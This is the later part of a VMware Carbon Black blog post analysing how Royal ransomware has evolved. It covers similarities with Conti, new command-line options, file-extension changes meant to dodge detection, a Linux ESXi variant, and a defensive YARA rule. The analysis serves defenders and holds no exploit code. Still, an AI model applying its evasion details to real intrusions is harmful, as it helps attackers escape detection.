600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
5:</em></strong><em> Venn Diagram comparing the 2020 Conti sample with 2023
Royal ransomware sample </em>[<a
href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">6</a>]</p>
<p>Of the similarities, the most notable would be the use of:</p> <ul>
<li>Encryption threading to speed up encryption</li> <li>Windows Restart Manager
to kill processes using files before encryption</li> <li>Network scanning to
identify network shares for encryption</li> <li>Filtering IP addresses to reduce
noise</li> <li>File encryption over SMB</li> <li>Command line execution with the
ability to specify local or network only</li> </ul> <p>One of the key
differences was the fact that the 2020 Conti sample was highly obfuscated using
a Conti mutex and unique encoding strings for API resolution, while the 2023
Royal sample did not have a mutex and often had commands in clear text. This
could be due to the Conti source code leak leaving no need to spend cycles
obfuscating the code if it is already public.</p> <h2>Where is Royal Now?</h2>
<p>Compared to a sample <a
href="https://www.cybereason.com/blog/royal-ransomware-analysis">[7]</a> seen in
late 2022, our sample of Royal ransomware had extra features to include two
additional command line arguments, two additional file extensions to avoid, and
a modified royal file extension to append to encrypted files. The command line
arguments that were added, “-localonly” and “-networkonly”, allowed the user to
specify whether to target the local host or scan and target network shares
instead of relying on a specified path.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83393"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png"
alt="" width="800" height="111"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM.png
907w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-300x42.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-768x107.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.55-PM-600x83.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
6:</em></strong><em> Screenshot of addition of command line arguments</em></p>
<p>The avoided file extensions identified were “.royal_w” and “.royal_u”. The
extension “.royal_w” was used to append to files after encryption, while the
purpose of “.royal_u” was not yet understood. In the past Royal ransomware
appended encrypted files simply with “.royal”, while the new sample used
“.royal_w”. It’s possible this change was utilized to evade detection in the
case a rule had been written based on previous indicators.</p> <p>More recently,
a new variant <a
href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html">[8]</a>
has been identified targeting Linux ESXi servers. Compared to our sample, this
new variant appended encrypted files with the “.royal_u” file extension, which
was foreshadowed in our sample. Replacing the “-localonly” and “-networkonly”
command line arguments with new arguments such as “stopvm” and added more file
extension exclusions.</p> <p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png"><img
decoding="async" loading="lazy" class="alignnone size-full wp-image-83392"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png"
alt="" width="331" height="208"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM.png
331w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.57.19-PM-300x189.png
300w" sizes="(max-width: 331px) 100vw, 331px" /></a></p> <p><strong><em>Figure
7:</em></strong><em> Screenshot of .royal_u extension used by the Linux Variant
being foreshadowed in our sample</em></p> <h2>Detecting a Constantly Evolving
Threat</h2> <p>It is clear that the Royal Ransomware Group is comfortable with
quickly adjusting and evolving its ransomware to fit its target’s environments.
With three different variants in just three months, the importance to stay aware
of these changes to ensure proper detection is paramount.</p> <p>When executed
locally, Royal ransomware is successfully blocked in the Carbon Black EDR
product via Default Ransomware Policies for sensor versions 3.7 and up. However,
in the case of File Encryption over SMB or executing via a virtual machine, EDR
products may not have full visibility into portions of the network activity.</p>
<p>The Endpoint Standard product receives updates for known malicious hashes and
blocks all types of Known or Suspect malware files from executing through
behavioral analysis. While the initial execution may be able to circumvent
detection via a virtual machine, it is likely that when the malware runs, it
will trigger additional alerts that are indicators of a more complex attack.
This is a good reminder to ensure your network has detection capabilities across
the entirety of the environment so that even if some undetected malicious
activity does occur, it will still be blocked when threat actors attempt actions
external to that device.</p> <p>With evolving threats like these, products like
VMware Carbon Black’s Managed Detection and Response (MDR) can be the difference
between a fully encrypted network or a contained threat and adds a much-needed
human element that can react with the ever-changing environment on a daily
basis. The MDR team is comprised of highly trained analysts that specialize in
post-exploitation defense. The team tracks technique changes and fulfills a
crucial gap between sensor and hash reputation updates, as well as dramatically
reducing the turn-around time for detecting emerging threats. For Royal
Ransomware in particular, the MDR team has leveraged the insight gained through
our wide customer pool to automate queries for proactive threat hunting which
has helped customers contain the threat early during the initial infection,
drastically minimizing network impact and preventing data exfiltration.</p>
<p><a
href="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png"><img
decoding="async" loading="lazy" class="alignnone wp-image-83391"
src="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png"
alt="" width="800" height="407"
srcset="https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM.png
843w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-300x153.png
300w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-768x391.png
768w,
https://blogs.vmware.com/security/files/2023/03/Screen-Shot-2023-03-16-at-12.56.00-PM-600x305.png
600w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><strong><em>Figure
8:</em></strong><em> Screenshot of Carbon Black Console Summary of Alert
Behaviors</em></p> <h2>Conclusion</h2> <p>Although it is expected for the threat
landscape to continue to evolve over time, Royal Ransomware has shown that it is
particularly worth keeping an eye on the threat actor in this case. With victims
targeted across numerous industries and countries, the Royal Ransomware Group
has demonstrated their ability to be pervasive, resourceful, and creative with
their implementations. The use of old and new techniques, and now expanding
their sights to Linux, Royal Ransomware has vastly increased its potential
targets due to these developments. It would be no surprise, if not expected, for
more adaptations in future variants to occur.</p> <p>In fact, upon finishing our
investigation our team detected new techniques in a more recent Royal ransomware
variant that fellow researchers at Red Canary [<a
href="https://redcanary.com/blog/detecting-msxsl-attacks/">10</a>] had
previously noted in 2018 involving a signed Microsoft binary called MSXSL.</p>
<h2><strong>Yara Rule</strong></h2> <table width="624"> <tbody> <tr> <td
width="624">rule royal_note_cmdln_fileext</p> <p>{</p> <p>meta:</p> <p>author =
“Carbon Black TAU” //bdana & snyderd</p> <p>date =
“2023-Feb-28”</p> <p>description = “Identifies Royal
Ransomware Variant with -localonly and -networkonly options available for
command line execution”</p> <p>rule_version = 1</p> <p>yara_version =
“4.2.0”</p> <p>exemplar_hash =
972429ab773f3f31180430f6fedc8b93b43f0f8d49b9e2d0ef22ac8589744648</p>
<p>strings:</p> <p>$ransom_note = “If you are reading this, it means that
your system were hit by Royal ransomware.” ascii wide</p> <p>$cmdline_1 =
“-path” ascii wide</p> <p>$cmdline_2 = “-id” ascii
wide</p> <p>$cmdline_3 = “-ep” ascii wide</p> <p>$cmdline_4 =
“-localonly” ascii wide</p> <p>$cmdline_5 =
“-networkonly” ascii wide</p> <p>$file_ext_1 =
“.royal_u” ascii wide</p> <p>$file_ext_2 = “.royal_w”
ascii wide</p> <p>condition:</p> <p>all of them</p> <p>}</td> </tr> </tbody>
</table> <p> </p> <p><strong>References</strong></p> <p>[1] <a
href="https://attack.mitre.org/techniques/T1564/006/">Hide Artifacts: Run
Virtual Instance, Sub-technique T1564.006 – Enterprise | MITRE
ATT&CK®</a></p> <p>[2] <a
href="https://twitter.com/VK_Intel/status/1557003350541242369">Vitali Kremez
Mind Map</a></p> <p>[3] <a
href="https://www.bleepingcomputer.com/news/security/ransomware-gangs-move-to-callback-social-engineering-attacks/">Ransomware
gangs move to ‘callback’ social engineering attacks</a></p> <p>[4]
<a
href="https://www.techrepublic.com/article/royal-ransomware-linux-vmware-esxi/">Royal
ransomware spreads to Linux and VMware ESXi</a></p> <p>[5] <a
href="https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive">Royal
Ransomware Deep Dive | Kroll</a></p> <p>[6] <a
href="https://blogs.vmware.com/security/2020/07/tau-threat-discovery-conti-ransomware.html">TAU
Threat Discovery: Conti Ransomware – VMware Security Blog</a></p> <p>[7]
<a href="https://www.cybereason.com/blog/royal-ransomware-analysis">Royal
Rumble: Analysis of Royal Ransomware</a></p> <p>[8] <a
href="https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html">Royal
Ransomware Expands Attacks by Targeting Linux ESXi Servers</a></p> <p>[9] <a
href="https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/">New
Royal Ransomware emerges in multi-million dollar attacks</a></p> <p>[10] <a
href="https://redcanary.com/blog/detecting-msxsl-attacks/">Detecting MSXSL Abuse
in the Wild</a></p> <p> </p> <p> </p><p>The post <a rel="nofollow"
href="https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html">Unveiling
the Evolution of Royal Ransomware</a> appeared first on <a rel="nofollow"
href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]>
...
</content:encoded>
...
</item>
...
</channel>
...
</rss>